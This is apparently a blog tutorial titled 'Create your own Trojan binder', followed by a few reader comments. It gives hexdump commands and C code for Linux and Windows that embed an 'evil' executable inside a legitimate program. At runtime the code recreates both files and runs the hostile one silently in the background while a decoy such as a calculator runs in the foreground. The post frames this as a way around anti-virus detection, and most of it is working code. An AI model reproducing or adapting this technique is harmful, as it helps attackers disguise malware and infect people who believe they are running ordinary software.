Create your own Trojan binder
1. Introduction
Sometimes you would like to merge your own piece of code (Trojan, Joke, …) to a legitimate executable file, under Windows or Linux. Unfortunately, binder tools you’ve downloaded from Internet are detected by anti-virus software. Worst, they are virus. Actually, bind two files is not an exploit. With a bit of c/c++ you can easily create your own binder.
This post will explains to you how to create a valid executable file, which contains actually two executable files. We will not write a full binder from scratch, but only provide you the basic idea needed to do it by your self.
1.1. Requirements
- We assume you know how to develop and compile C programs under Linux or Windows.
- hexdump utility.
1.2. The steps
The idea is to dump the initial executable files as hexadecimal, into C variables. Like this:
unsigned char evil[] = {\xaa, \xaa, \xaa, ... , \xaa }; unsigned char real_prog[] = {\xbb, \xbb, \xbb, ... , \xbb };
Next you have to write a C function that will locally recreates the files at run-time, and executes both files (in foreground or background). System calls such as open(), write(), fork() and exec() will be used for Linux, CreateProcess() and so on for Windows.
2. Lets practice
2.1. Dumping binary into C variables
In order to dump an executable file, you need hexdump utility (we will use it under Linux). Use the following syntax to try by your self:
[root@host ]$ cat evil.exe | hexdump -v -e '"0x" 1/1 "%02X" ","'
0x7F,0x45,0x4C,0x46,0x01,0x01,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB4,0x08,0x00,0x00,
0x00,....
It’s time to create the C variables. We will store them into a C header file (.h). Actually, it’s not a good practice to declare a variable inside a header file. Usually, the variable must be declared inside the “.c” file (the module). But for clarity, we will do an exception.
[root@host ]$ echo "const unsigned char evil[] = {" > hex-evil.h
[root@host ]$ cat evil.exe | hexdump -v -e '"0x" 1/1 "%02X" ","' | sed s/,$// >> hex-evil.h
[root@host ]$ echo "};" >> hex-evil.h
Do the same for the second binary.
[root@host ]$ echo "const unsigned char real_prog[] = {" > hex-real-prog.h
[root@host ]$ cat real-prog.exe | hexdump -v -e '"0x" 1/1 "%02X" ","' | sed s/,$// >> hex-real-prog.h
[root@host ]$ echo "};" >> hex-real-prog.h
2.2. Re-create binary files at runtime, and execute them
Recreating the files is only a matter of writing back the variable content into a recently created file.
For Linux: Create a C function like this:
#include "hex-evil.h" #include "hex-real-prog.h" int recreate_binary() { FILE *file; // evilcode file = fopen("evil.bin", "w"); if(file){ fwrite(evil, 1, sizeof(evil), file); fclose(file); chmod("evil.bin",0755); }else return 1; // realprog file = fopen("realprog.bin", "w"); if(file){ fwrite(real_prog, 1, sizeof(real_prog), file); fclose(file); chmod("realprog.bin",0755); }else return 1; return 0; } int execute_binary(){ signal(SIGCHLD, SIG_IGN); // avoid zombie, don't need exit info from child int pidMt; if((pidMt=fork())==0){ execl("evil.bin", "evil.bin", (char *) 0); perror("exec failed"); exit(0); // Failed } if((pidMt=fork())==0){ execl("realprog.bin", "realprog.bin", (char *) 0); perror("exec failed"); exit(0); // Failed } return 0; }
For Windows: this is an equivalent
// Create and run "evil code" (silently) file = CreateFile(evil_filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,0); WriteFile(file, evil_data, evil_len, &written,0); CloseHandle(file); //Run it (silently) ShellExecute(0, "open", evil_filename ,NULL, NULL, SW_HIDE); // Create and run "legitimate prog" (foreground) file = CreateFile(calculator_filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); WriteFile(file,calculator_data, calculator_len, &written,0); CloseHandle(file); ShellExecute(0, "open", calculator_filename ,NULL, NULL, SW_SHOWDEFAULT);
3. The end
It’s time to put everything together. Hope you enjoy.
© 2010 – 2014, foip. All rights reserved.
Comments are closed.
Sir, thanks for the wonderful guide. The linux code is working perfectly fine. Facing problem in windows code. Please tell me complete code for windows
in windows it shows error that cannot run in 64 bit windows
You must first learn how to develop and compile code under Windows, then try again ..